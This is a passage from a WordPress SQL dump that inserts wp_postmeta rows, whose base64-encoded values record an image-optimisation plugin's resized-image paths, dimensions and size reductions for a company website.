TZcLzA5XC9jbGVhbmVyLTE2MDB4MTA2OC5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NsZWFuZXItMTYwMHgxMDY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2NsZWFuZXItMTYwMHgxMDY4LmpwZyIsInJlZHVjdGlvbiI6Mzc0NCwidGltZSI6MTQ4MzU3MzIzNCwiaWQiOjEzMzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY2xlYW5lci0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NsZWFuZXItMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jbGVhbmVyLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1MDYsInRpbWUiOjE0ODM1NzMyMzcsImlkIjoxMzM5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NsZWFuZXItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jbGVhbmVyLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvY2xlYW5lci0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDA4LCJ0aW1lIjoxNDgzNTczMjQxLCJpZCI6MTMzOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jbGVhbmVyLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY2xlYW5lci0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2NsZWFuZXItMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjQzMiwidGltZSI6MTQ4MzU3MzI0NCwiaWQiOjEzMzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY2xlYW5lci01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NsZWFuZXItNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jbGVhbmVyLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo2MzcsInRpbWUiOjE0ODM1NzMyNDgsImlkIjoxMzM5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY2xlYW5lci0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NsZWFuZXItMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jbGVhbmVyLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0MTEsInRpbWUiOjE0ODM1NzMyNTEsImlkIjoxMzM5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY2xlYW5lci0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NsZWFuZXItMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jbGVhbmVyLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0MjMsInRpbWUiOjE0ODM1NzMyNTUsImlkIjoxMzM5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY2xlYW5lci0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NsZWFuZXItMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jbGVhbmVyLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo0NDYsInRpbWUiOjE0ODM1NzMyNTgsImlkIjoxMzM5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY2xlYW5lci0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NsZWFuZXItMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jbGVhbmVyLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo0NjEsInRpbWUiOjE0ODM1NzMyNjIsImlkIjoxMzM5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY2xlYW5lci0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NsZWFuZXItMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jbGVhbmVyLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo1MzgsInRpbWUiOjE0ODM1NzMyNjUsImlkIjoxMzM5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY2xlYW5lci00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NsZWFuZXItNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jbGVhbmVyLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjo1NjEsInRpbWUiOjE0ODM1NzMyNjksImlkIjoxMzM5fV0='); 
INSERT INTO `wp_postmeta` VALUES (29613, 1293, 'wpfc_optimisation_reduction', '11289'); 
INSERT INTO `wp_postmeta` VALUES (29614, 1293, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy04OC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tODguanBnIiwid2lkdGgiOjU2MTYsImhlaWdodCI6Mzc0NCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU3MzI3NCwiaWQiOiIxMjkzIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTg4LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy04OC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tODgtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjU2NiwidGltZSI6MTQ4MzU3MzI3NywiaWQiOjEyOTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy04OC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tODgtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTg4LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxMDI1LCJ0aW1lIjoxNDgzNTczMjgxLCJpZCI6MTI5M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTg4LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy04OC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tODgtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjk1NCwidGltZSI6MTQ4MzU3MzI4NSwiaWQiOjEyOTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy04OC0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTg4LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTg4LTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjM0MTMsInRpbWUiOjE0ODM1NzMyOTAsImlkIjoxMjkzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tODgtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTg4LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy04OC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTE4LCJ0aW1lIjoxNDgzNTczMjk0LCJpZCI6MTI5M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTg4LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy04OC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tODgtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQ0MSwidGltZSI6MTQ4MzU3MzI5NywiaWQiOjEyOTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy04OC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tODgtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTg4LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0NjAsInRpbWUiOjE0ODM1NzMzMDAsImlkIjoxMjkzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tODgtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTg4LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy04OC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6ODYxLCJ0aW1lIjoxNDgzNTczMzA1LCJpZCI6MTI5M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tODgtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTg4LTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy04OC0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6NDI4LCJ0aW1lIjoxNDgzNTczMzA4LCJpZCI6MTI5M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tODgtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTg4LTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy04OC0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NDM0LCJ0aW1lIjoxNDgzNTczMzExLCJpZCI6MTI5M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tODgtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTg4LTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy04OC0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NDQxLCJ0aW1lIjoxNDgzNTczMzE1LCJpZCI6MTI5M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tODgtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTg4LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy04OC0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTE0LCJ0aW1lIjoxNDgzNTczMzE4LCJpZCI6MTI5M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tODgtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTg4LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy04OC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NTczLCJ0aW1lIjoxNDgzNTczMzIyLCJpZCI6MTI5M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tODgtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTg4LTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy04OC00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6NjYxLCJ0aW1lIjoxNDgzNTczMzI2LCJpZCI6MTI5M31d'); 
INSERT INTO `wp_postmeta` VALUES (29615, 1291, 'wpfc_optimisation_reduction', '69587'); 
INSERT INTO `wp_postmeta` VALUES (29616, 1291, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvREVOVEFMLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvREVOVEFMLmpwZyIsIndpZHRoIjozMDAwLCJoZWlnaHQiOjIwMDgsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9ERU5UQUwuanBnIiwicmVkdWN0aW9uIjo2OTU3MywidGltZSI6MTQ4MzU3MzMzNSwiaWQiOiIxMjkxIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9ERU5UQUwtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9ERU5UQUwtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9ERU5UQUwtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzMzMzgsImlkIjoxMjkxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0RFTlRBTC04MDB4NTM1LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTM1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0RFTlRBTC04MDB4NTM1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0RFTlRBTC04MDB4NTM1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MzM0MSwiaWQiOjEyOTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRt